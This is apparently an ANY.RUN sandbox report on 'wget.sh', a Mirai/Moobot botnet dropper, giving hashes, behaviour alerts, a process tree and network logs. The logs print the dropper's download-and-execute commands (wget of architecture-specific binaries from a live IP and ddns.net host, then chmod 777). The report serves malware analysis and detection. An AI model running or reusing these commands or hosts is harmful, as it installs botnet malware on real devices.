Malware analysis wget.sh Malicious activity | ANY.RUN

Add for printing

File name:	wget.sh
Full analysis:	https://app.any.run/tasks/548da99e-03f7-4b67-9901-f759545c5810
Verdict:	Malicious activity
Threats:	A botnet is a group of internet-connected devices that are controlled by a single individual or group, often without the knowledge or consent of the device owners. These devices can be used to launch a variety of malicious attacks, such as distributed denial-of-service (DDoS) attacks, spam campaigns, and data theft. Botnet malware is the software that is used to infect devices and turn them into part of a botnet. Mirai is a self-propagating malware that scans the internet for vulnerable IoT devices and infects them to create a botnet. Mirai variants utilize lists of common default credentials to gain access to devices. Mirai's primary use is for launching distributed denial-of-service (DDoS) attacks, but it has also been used for cryptocurrency mining. Malware Trends Tracker >>>
Analysis date:	June 21, 2025, 19:43:19
OS:	Ubuntu 22.04.2
Tags:	mirai botnet moobot
Indicators:
MIME:	text/plain
File info:	ASCII text
MD5:	42225D45C7C391200CD3040522E0FB0B
SHA1:	0E1C544140FF92DF0C339DFFC9238B825442B968
SHA256:	2EDF0A19D074FB88DBA301442D78321E59A37A671CD45B7A9C2AF216341FC951
SSDEEP:	12:kuQj+/bLq+/xNIl5zA+/if0LKj+/SgOs+/VC+/oa/+/kSE+/FtaKA+/U0j+/HiA4:NQeLZNI7HKDgGIajutBGvAxv

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Add for printing

MALICIOUS
- Application was dropped or rewritten from another process
  - systemd (PID: 41463)
  - systemd (PID: 41465)
  - x86_64 (PID: 41473)
  - x86_64 (PID: 41475)
  - x86 (PID: 41457)
  - x86 (PID: 41456)
  - systemd (PID: 41464)
  - x86_64 (PID: 41468)
  - x86_64 (PID: 41476)
- Connects to the CnC server
  - systemd (PID: 41463)
  - x86_64 (PID: 41473)
- MIRAI has been detected (SURICATA)
  - systemd (PID: 41463)
  - x86_64 (PID: 41473)
SUSPICIOUS
- Starts itself from another location
  - x86 (PID: 41456)
- Uses wget to download content
  - bash (PID: 41392)
- Executes commands using command-line interpreter
  - sudo (PID: 41391)
  - bash (PID: 41392)
- Modifies file or directory owner
  - sudo (PID: 41388)
- Potential Corporate Privacy Violation
  - wget (PID: 41394)
  - wget (PID: 41399)
  - wget (PID: 41409)
  - wget (PID: 41413)
  - wget (PID: 41418)
  - wget (PID: 41422)
  - wget (PID: 41433)
  - wget (PID: 41439)
  - wget (PID: 41448)
  - wget (PID: 41428)
  - wget (PID: 41452)
  - wget (PID: 41466)
- Connects to the server without a host name
  - wget (PID: 41394)
  - wget (PID: 41399)
  - wget (PID: 41409)
  - wget (PID: 41413)
  - wget (PID: 41418)
  - wget (PID: 41428)
  - wget (PID: 41422)
  - wget (PID: 41433)
  - wget (PID: 41439)
  - wget (PID: 41448)
  - wget (PID: 41452)
  - wget (PID: 41466)
- Connects to unusual port
  - systemd (PID: 41463)
  - x86_64 (PID: 41473)
- Contacting a server suspected of hosting an CnC
  - systemd (PID: 41463)
  - x86_64 (PID: 41473)
- Executes the "rm" command to delete files or directories
  - dash (PID: 41469)
  - bash (PID: 41392)
  - x86 (PID: 41457)
INFO
- Checks timezone
  - wget (PID: 41394)
  - wget (PID: 41399)
  - wget (PID: 41409)
  - wget (PID: 41413)
  - wget (PID: 41418)
  - wget (PID: 41422)
  - wget (PID: 41433)
  - wget (PID: 41439)
  - wget (PID: 41448)
  - wget (PID: 41452)
  - wget (PID: 41428)
  - wget (PID: 41466)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

195

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID

CMD

Path

Indicators

Parent process

41387

/bin/sh -c "sudo chown user /tmp/wget\.sh && chmod +x /tmp/wget\.sh && DISPLAY=:0 sudo -iu user /tmp/wget\.sh "

/usr/bin/dash

—

UbvyYXL4x2mYa65Q

User:

root

Integrity Level:

UNKNOWN

Exit code:

Modules

Images
/usr/lib/x86_64-linux-gnu/libc.so.6

41388

sudo chown user /tmp/wget.sh

/usr/bin/sudo

—

dash

User:

root

Integrity Level:

UNKNOWN

Exit code:

Modules

Images
/usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/libexec/sudo/libsudo_util.so.0.0.0
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
/usr/libexec/sudo/sudoers.so
/usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11

41389

chown user /tmp/wget.sh

/usr/bin/chown

—

sudo

User:

root

Integrity Level:

UNKNOWN

Exit code:

Modules

Images
/usr/lib/x86_64-linux-gnu/libc.so.6

41390

chmod +x /tmp/wget.sh

/usr/bin/chmod

—

dash

User:

root

Integrity Level:

UNKNOWN

Exit code:

Modules

Images
/usr/lib/x86_64-linux-gnu/libc.so.6

41391

sudo -iu user /tmp/wget.sh

/usr/bin/sudo

—

dash

User:

root

Integrity Level:

UNKNOWN

Exit code:

Modules

Images
/usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/libexec/sudo/libsudo_util.so.0.0.0
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
/usr/libexec/sudo/sudoers.so
/usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11

41392

-bash --login -c \/tmp\/wget\.sh

/usr/bin/bash

—

sudo

User:

user

Integrity Level:

UNKNOWN

Exit code:

Modules

Images
/usr/lib/x86_64-linux-gnu/libtinfo.so.6.3
/usr/lib/x86_64-linux-gnu/libc.so.6

41393

/usr/bin/locale-check C.UTF-8

/usr/bin/locale-check

—

bash

User:

user

Integrity Level:

UNKNOWN

Exit code:

Modules

Images
/usr/lib/x86_64-linux-gnu/libc.so.6

41394

wget http://103.20.102.84/arm

/usr/bin/wget

bash

User:

user

Integrity Level:

UNKNOWN

Exit code:

Modules

Images
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libuuid.so.1.3.0
/usr/lib/x86_64-linux-gnu/libidn2.so.0.3.7
/usr/lib/x86_64-linux-gnu/libssl.so.3
/usr/lib/x86_64-linux-gnu/libcrypto.so.3
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
/usr/lib/x86_64-linux-gnu/libpsl.so.5.3.2
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libunistring.so.2.2.0

41395

chmod 777 arm

/usr/bin/chmod

—

bash

User:

user

Integrity Level:

UNKNOWN

Exit code:

Modules

Images
/usr/lib/x86_64-linux-gnu/libc.so.6

41396

-bash --login -c \/tmp\/wget\.sh

/usr/bin/bash

—

bash

User:

user

Integrity Level:

UNKNOWN

Exit code:

32256

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
41394	wget	/home/user/arm		o
		MD5:—	SHA256:—
41399	wget	/home/user/arm5		binary
		MD5:—	SHA256:—
41409	wget	/home/user/arm6		binary
		MD5:—	SHA256:—
41413	wget	/home/user/arm7		o
		MD5:—	SHA256:—
41418	wget	/home/user/m68k		binary
		MD5:—	SHA256:—
41422	wget	/home/user/mips		binary
		MD5:—	SHA256:—
41428	wget	/home/user/mpsl		o
		MD5:—	SHA256:—
41433	wget	/home/user/ppc		binary
		MD5:—	SHA256:—
41439	wget	/home/user/sh4		binary
		MD5:—	SHA256:—
41448	wget	/home/user/spc		o
		MD5:—	SHA256:—

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
—	—	GET	204	91.189.91.98:80	http://connectivity-check.ubuntu.com/	unknown	—	—	whitelisted
41409	wget	GET	200	103.20.102.84:80	http://103.20.102.84/arm6	unknown	—	—	unknown
41394	wget	GET	200	103.20.102.84:80	http://103.20.102.84/arm	unknown	—	—	unknown
41399	wget	GET	200	103.20.102.84:80	http://103.20.102.84/arm5	unknown	—	—	unknown
41413	wget	GET	200	103.20.102.84:80	http://103.20.102.84/arm7	unknown	—	—	unknown
41418	wget	GET	200	103.20.102.84:80	http://103.20.102.84/m68k	unknown	—	—	unknown
41422	wget	GET	200	103.20.102.84:80	http://103.20.102.84/mips	unknown	—	—	unknown
41433	wget	GET	200	103.20.102.84:80	http://103.20.102.84/ppc	unknown	—	—	unknown
41428	wget	GET	200	103.20.102.84:80	http://103.20.102.84/mpsl	unknown	—	—	unknown
41448	wget	GET	200	103.20.102.84:80	http://103.20.102.84/spc	unknown	—	—	unknown

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
—	—	91.189.91.97:80	connectivity-check.ubuntu.com	Canonical Group Limited	US	whitelisted
484	avahi-daemon	224.0.0.251:5353	—	—	—	unknown
—	—	91.189.91.98:80	connectivity-check.ubuntu.com	Canonical Group Limited	US	whitelisted
1178	snap-store	169.150.255.184:443	odrs.gnome.org	—	GB	whitelisted
512	snapd	185.125.188.57:443	api.snapcraft.io	Canonical Group Limited	GB	whitelisted
512	snapd	185.125.188.58:443	api.snapcraft.io	Canonical Group Limited	GB	whitelisted
512	snapd	185.125.188.59:443	api.snapcraft.io	Canonical Group Limited	GB	whitelisted
512	snapd	185.125.188.54:443	api.snapcraft.io	Canonical Group Limited	GB	whitelisted
41394	wget	103.20.102.84:80	mdnsucchim.ddns.net	—	—	malicious
41399	wget	103.20.102.84:80	mdnsucchim.ddns.net	—	—	malicious

DNS requests

Domain	IP	Reputation
google.com	142.250.185.238 2a00:1450:4001:813::200e	whitelisted
odrs.gnome.org	169.150.255.184 37.19.194.80 169.150.255.180 195.181.170.18 212.102.56.178 207.211.211.27 195.181.175.41 2a02:6ea0:c700::101 2a02:6ea0:c700::18 2a02:6ea0:c700::19 2a02:6ea0:c700::112 2a02:6ea0:c700::21 2a02:6ea0:c700::107 2a02:6ea0:c700::11	whitelisted
connectivity-check.ubuntu.com	91.189.91.98 185.125.190.98 91.189.91.49 185.125.190.17 91.189.91.48 185.125.190.97 185.125.190.48 185.125.190.18 91.189.91.97 185.125.190.96 185.125.190.49 91.189.91.96 2620:2d:4002:1::196 2620:2d:4000:1::98 2620:2d:4002:1::198 2620:2d:4000:1::2a 2001:67c:1562::24 2001:67c:1562::23 2620:2d:4000:1::23 2620:2d:4000:1::2b 2620:2d:4000:1::97 2620:2d:4000:1::22 2620:2d:4000:1::96 2620:2d:4002:1::197	whitelisted
api.snapcraft.io	185.125.188.57 185.125.188.58 185.125.188.59 185.125.188.54 2620:2d:4000:1010::344 2620:2d:4000:1010::117 2620:2d:4000:1010::2e6 2620:2d:4000:1010::42	whitelisted
10.100.168.192.in-addr.arpa	—	unknown
mdnsucchim.ddns.net	103.20.102.84	malicious

Threats

PID	Process	Class	Message
41394	wget	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP
41399	wget	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP
41409	wget	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP
41413	wget	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP
41418	wget	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP
41422	wget	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP
41428	wget	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP
41433	wget	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP
41439	wget	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP
41448	wget	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP

Add for printing

No debug info

General Info

wget.sh

42225D45C7C391200CD3040522E0FB0B

0E1C544140FF92DF0C339DFFC9238B825442B968

2EDF0A19D074FB88DBA301442D78321E59A37A671CD45B7A9C2AF216341FC951

12:kuQj+/bLq+/xNIl5zA+/if0LKj+/SgOs+/VC+/oa/+/kSE+/FtaKA+/U0j+/HiA4:NQeLZNI7HKDgGIajutBGvAxv

Software environment set and analysis options

Launch configuration

Software preset

Behavior activities

MALICIOUS

Application was dropped or rewritten from another process

Connects to the CnC server

MIRAI has been detected (SURICATA)

SUSPICIOUS

Starts itself from another location

Uses wget to download content

Executes commands using command-line interpreter

Modifies file or directory owner

Potential Corporate Privacy Violation

Connects to the server without a host name

Connects to unusual port

Contacting a server suspected of hosting an CnC

Executes the "rm" command to delete files or directories

INFO

Checks timezone

Malware configuration

Static information

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings